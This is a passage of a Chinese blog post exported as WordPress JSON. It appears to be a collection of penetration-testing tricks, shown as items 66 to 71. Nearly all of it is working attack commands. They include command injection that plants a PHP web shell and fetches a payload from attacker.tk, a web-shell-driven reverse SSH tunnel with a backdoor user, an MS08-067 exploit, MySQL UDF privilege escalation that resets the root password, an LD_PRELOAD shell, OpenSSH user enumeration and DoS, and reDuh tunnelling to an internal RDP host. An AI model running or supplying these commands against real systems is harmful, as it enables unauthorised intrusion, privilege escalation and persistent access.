\/\/ \u751f\u6210 shell \u4f7f\u7528\u7684 ssh \u5bc6\u94a5\n$ wget -O - -q \"http:\/\/domain.tk\/sh.php?cmd=whoami\"\n$ wget -O - -q \"http:\/\/domain.tk\/sh.php?cmd=ssh-keygen -f \/tmp\/id_rsa -N \"\" \"\n$ wget -O - -q \"http:\/\/domain.tk\/sh.php?cmd=cat \/tmp\/id_rsa\"\n\/\/ \u589e\u52a0\u7528\u6237 tempuser \n$ useradd -m tempuser\n$ mkdir \/home\/tempuser\/.ssh && chmod 700 \/home\/tempuser\/.ssh\n$ wget -O - -q \"http:\/\/domain.tk\/sh.php?cmd=cat \/tmp\/id_rsa\" > \/home\/tempuser\/.ssh\/authorized_keys\n$ chmod 700 \/home\/tempuser\/.ssh\/authorized_keys\n$ chown -R tempuser:tempuser \/home\/tempuser\/.ssh\n\/\/ \u53cd\u5f39 ssh shell\n$ wget -O - -q \"http:\/\/domain.tk\/sh.php?cmd=ssh -i \/tmp\/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@\n<\/code><\/pre>\n<\/p>\n
66.\u5229\u7528 POST \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u83b7\u53d6 Shell<\/p>\n<\/p>\n
attacker:~$ curl -i -s -k  -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http:\/\/victum.tk\/command.php'\nattacker:~$ curl -i -s -k  -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http:\/\/victum.tk\/command.php'\nattacker:~$ curl http:\/\/victum.tk\/shell.php?cmd=id\n\/\/ \u5728\u670d\u52a1\u5668\u4e0a\u4e0b\u8f7d shell (phpshell.php)\nhttp:\/\/victum.tk\/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http:\/\/attacker.tk\/phpshell.txt%22,%20%27r%27%29%29;%27\n\/\/ \u8fd0\u884c nc \u5e76\u6267\u884c phpshell.php\nattacker:~$ nc -nvlp \n<\/code><\/pre>\n<\/p>\n
67.MS08-067 \u2013 \u4e0d\u4f7f\u7528 Metasploit<\/p>\n<\/p>\n
$ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205\n$ searchsploit ms08-067\n$ python \/usr\/share\/exploitdb\/platforms\/windows\/remote\/7132.py 192.168.31.205 1\n<\/code><\/pre>\n<\/p>\n
68.\u901a\u8fc7 MySQL Root \u8d26\u6237\u5b9e\u73b0\u63d0\u6743<\/p>\n<\/p>\n
# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)\n$ wget 0xdeadbeef.info\/exploits\/raptor_udf2.c\n$ gcc -g -c raptor_udf2.c\n$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc\nmysql -u root -p\nmysql> use mysql;\nmysql> create table foo(line blob);\nmysql> insert into foo values(load_file('\/home\/user\/raptor_udf2.so'));\nmysql> select * from foo into dumpfile '\/usr\/lib\/mysql\/plugin\/raptor_udf2.so';\nmysql> create function do_system returns integer soname 'raptor_udf2.so';\nmysql> select * from mysql.func;\nmysql> select do_system('echo \"root:passwd\" | chpasswd > \/tmp\/out; chown user:user \/tmp\/out');\nuser:~$ su -\nPassword:\nuser:~# whoami\nroot\nroot:~# id\nuid=0(root) gid=0(root) groups=0(root)\n<\/code><\/pre>\n<\/p>\n
69.\u4f7f\u7528 LD_PRELOAD \u6ce8\u5165\u7a0b\u5e8f<\/p>\n
\u62d3\u5c55\u5b66\u4e60\u300a\u3010Linux\u3011LD_PRELOAD\u7528\u6cd5\u300b\uff1a<\/p>\n<\/p>\n
$ wget https:\/\/github.com\/jivoi\/pentest\/ldpreload_shell.c\n$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so\n$ sudo -u user LD_PRELOAD=\/tmp\/ldpreload_shell.so \/usr\/local\/bin\/somesoft\n<\/code><\/pre>\n<\/p>\n
70.\u9488\u5bf9 OpenSSH \u7528\u6237\u8fdb\u884c\u679a\u4e3e\u65f6\u5e8f\u653b\u51fb<\/p>\n
\u679a\u4e3e\u65f6\u5e8f\u653b\u51fb(\u201cEnumeration Timing Attack\u201d)\u5c5e\u4e8e\u4fa7\u4fe1\u9053\u653b\u51fb\/\u65c1\u8def\u653b\u51fb(Side Channel Attack)\uff0c\u4fa7\u4fe1\u9053\u653b\u51fb\u662f\u6307\u5229\u7528\u4fe1\u9053\u5916\u7684\u4fe1\u606f\uff0c\u6bd4\u5982\u52a0\u89e3\u5bc6\u7684\u901f\u5ea6\/\u52a0\u89e3\u5bc6\u65f6\u82af\u7247\u5f15\u811a\u7684\u7535\u538b\/\u5bc6\u6587\u4f20\u8f93\u7684\u6d41\u91cf\u548c\u9014\u5f84\u7b49\u8fdb\u884c\u653b\u51fb\u7684\u65b9\u5f0f\uff0c\u4e00\u4e2a\u8bcd\u5f62\u5bb9\u5c31\u662f\u201c\u65c1\u6572\u4fa7\u51fb\u201d\u3002<\/p>\n
osueta \u662f\u4e00\u4e2a\u7528\u4e8e\u5bf9 OpenSSH \u8fdb\u884c\u65f6\u5e8f\u653b\u51fb\u7684 python2 \u811a\u672c\uff0c\u5176\u53ef\u4ee5\u5229\u7528\u65f6\u5e8f\u653b\u51fb\u679a\u4e3e OpenSSH \u7528\u6237\u540d\uff0c\u5e76\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u53ef\u4ee5\u5bf9 OpenSSH \u670d\u52a1\u5668\u8fdb\u884c DOS \u653b\u51fb\u3002<\/p>\n<\/p>\n
\/\/ \u9879\u76ee\u5730\u5740\uff1ahttps:\/\/github.com\/c0r3dump3d\/osueta\n$ .\/osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes\n$ .\/osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes \u2013dos no -L userfile.txt\n<\/code><\/pre>\n<\/p>\n
71.\u4f7f\u7528 ReDuh \u6784\u9020\u5408\u6cd5\u7684 HTTP \u8bf7\u6c42\u4ee5\u5efa\u7acb TCP \u901a\u9053<\/p>\n
ReDuh \u662f\u4e00\u4e2a\u901a\u8fc7 HTTP \u534f\u8bae\u5efa\u7acb\u96a7\u9053\u4f20\u8f93\u5404\u79cd\u5176\u4ed6\u6570\u636e\u7684\u5de5\u5177\u3002\u5176\u53ef\u4ee5\u628a\u5185\u7f51\u670d\u52a1\u5668\u7684\u7aef\u53e3\u901a\u8fc7 http\/https \u96a7\u9053\u8f6c\u53d1\u5230\u672c\u673a\uff0c\u5f62\u6210\u4e00\u4e2a\u8fde\u901a\u56de\u8def\u3002\u7528\u4e8e\u76ee\u6807\u670d\u52a1\u5668\u5728\u5185\u7f51\u6216\u505a\u4e86\u7aef\u53e3\u7b56\u7565\u7684\u60c5\u51b5\u4e0b\u8fde\u63a5\u76ee\u6807\u670d\u52a1\u5668\u5185\u90e8\u5f00\u653e\u7aef\u53e3\u3002<\/p>\n
\u9879\u76ee\u5730\u5740\uff1a<\/p>\n<\/p>\n
\/\/ \u6b65\u9aa4 1\n\/\/ \u4e0a\u4f20 reDuh.jsp \u76ee\u6807\u670d\u52a1\u5668\n$ http:\/\/192.168.10.50\/uploads\/reDuh.jsp\n\/\/ \u6b65\u9aa4 2\n\/\/ \u5728\u672c\u673a\u8fd0\u884c reDuhClient \n$ java -jar reDuhClient.jar http:\/\/192.168.10.50\/uploads\/reDuh.jsp\n\/\/ \u6b65\u9aa4 3\n\/\/ \u4f7f\u7528 nc \u8fde\u63a5\u7ba1\u7406\u7aef\u53e3\n$ nc -nvv 127.0.0.1 1010\n\/\/ \u6b65\u9aa4 4\n\/\/ \u4f7f\u7528\u96a7\u9053\u8f6c\u53d1\u672c\u5730\u7aef\u53e3\u5230\u8fdc\u7a0b\u76ee\u6807\u7aef\u53e3\n[createTunnel] 7777:172.16.0.4:3389\n\/\/ \u6b65\u9aa4 5\n\/\/ \u4f7f\u7528 RDP \u8fde\u63a5\u8fdc\u7a0b\n$ \/usr\/bin\/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7\n<\/code><\/pre>\n<\/p>\n
<\/s><\/code><\/p>\n","protected":false},"excerpt":{"rendered":"
\u8d85\u5168\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\u5b9e\u6218\u4f7f\u7528\u6280\u5de7\u5408\u96c6Net-Square \u7684Httprint\u5de5\u5177\uff0c\u662f\u4e00\u4e2a\u81ea\u52a8\u5316\u7684http\u6307\u7eb9\u5206\u6790\u5de5\u5177,\u5e26\u6709\u53ef\u5b9a\u5236web\u670d\u52a1\u5668\u6307\u7eb9\u6570\u636e\u5e93\uff0c\u8fd0\u7528\u7edf\u8ba1\u5b66\u539f\u7406\uff0c\u7ec4\u5408\u903b\u8f91\u5b66\u6280\u672f\uff0c\u53ef\u6709\u6548\u8bc6\u522bHttp\u670d\u52a1\u5668\u7684\u7c7b\u578b\u3002\u4e0b\u8f7d\u5730\u5740\uff1a6<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"topic":[],"class_list":["post-3165","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/3165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/comments?post=3165"}],"version-history":[{"count":0,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/3165\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/media?parent=3165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/categories?post=3165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/tags?post=3165"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/topic?post=3165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}